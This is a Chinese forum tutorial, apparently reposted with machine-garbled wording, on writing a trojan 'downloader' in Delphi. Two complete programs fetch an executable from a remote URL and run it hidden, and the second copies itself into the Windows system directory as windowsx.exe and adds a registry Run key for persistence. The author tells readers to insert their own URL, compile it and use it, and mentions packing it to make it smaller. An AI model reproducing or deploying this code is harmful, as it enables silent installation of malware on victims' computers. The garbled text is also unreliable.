编写自己的潜入者个人版之基础篇

  作者：HEART　　来自：朋侪之家论坛
  没有人说编程～小弟就慢慢演示打造一个小我私家完美版的"潜入者"的要领
  先从底子开始～
  其他不多说了～那别人的步伐改造太累～
  自己写～方便
  这里写个最简略的"潜入者"
  原理如下
  下载文件运行～查找函数库
  找到两个函数（这次写的下载者就两个函数）
  urlmon.pas->UrlDownloadToFile
  Windows.pas->Winexec(应该很熟悉吧)
  这次我们就用这两个函数搞定使命！
  CODE
  program Downloader;
  uses
  Windows,Urlmon;
  begin
  if URLDownloadToFile(nil, 'http://www.pysky.net/Test.exe', 'Test.exe', 0, nil) = S_OK then winexec('Test.exe',0);
  end.
  先下载http://www.pysky.net/Test.exe生存到以后目次为Test.exe
  然后调用winexec函数运行Test.exe~Winexec背面的参数0=隐藏运行（可以隐藏步伐界面）1=标准运行（便是运行了～嘻嘻）
  好了把下面的下载地点改成你的就OK了～自己编译一下～就可以拿去用了～
  生成文件8.5K用FSG紧缩乘4K(潜入者是用MASM写的～葛军不会汇编的～以是不是她写的～)
  编写潜入者小我私家版之二by HEART篇
  将讲述如何给底子版下载者添加～体系启动运行和联系关系exe文件运行(蔬菜的史来姆号称可以传染exe文件实在是便是联系关系exe文件～没有什么特别的中央！)和如何将本身复制到安全的目次内运行（最安全的中央固然便是～～system目次了～嘻嘻～～）
  底子版的生成器我就不写了～等到我讲到～～完美版的时间再作吧～这个例子只需大家了解原理就可以了～固然提供的代码完全可用
  附件 Downloader.rar：http://blog.blogchina.com/upload/2004-11-11/20041111010951561903.rar
  ---------------------------------------------------------------------------------------------
  这个是别的一个朋侪叫leun给他写的＂二＂
  大概代码如下:
  program Downloader;
  uses
  Windows,
  registry;
  const
  exename ='windowsx.exe';
  var
  DestFile: string;
  function URLDownloadToFile(Caller: cardinal; URL: PChar; FileName: PChar; Reserved: LongWord; StatusCB: cardinal): Longint; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';
  function GetSysDir: String; //得到体系目次
  var
  Buf: array[0..MAX_PATH] of char;
  begin
  GetSystemDirectory(Buf, MAX_PATH);
  Result := Buf;
  if Result[Length(Result)]<>'\' then Result := Result + '\';
  end;
  procedure reg; //写入注册表启动项
  var Reg:Tregistry;
  begin
  Reg:=Tregistry.Create;
  Reg.RootKey:=HKEY_LOCAL_MACHINE;
  Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False);
  Reg.WriteString('down',GetSysDir+exename);
  Reg.CloseKey;
  Reg.Free;
  end;
  procedure downexe;
  begin
  DestFile := GetSysDir() + exename;
  UrlDownloadToFile(0,'http://www.163.net/down/xxx.exe',PChar(DestFile),0,0);
  WinExec(PChar(DestFile),0);
  end;
  begin;
  reg; //写启动项
  downexe; //下载EXE并运行
  end.
  其中EXE联系关系不稳定,主要是联系关系后WINDOWS不能正常关机.我办理不了此问题,哪位dx能将它完成? ... 由于加启动项内里我用了个registry单位,步伐增大至80多KB,大啊...
  有别的要领加启动项不消registry.步伐只有20KB内(不加壳的),暂不列出了,由于下面要领简略,容易看懂,哈哈...
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：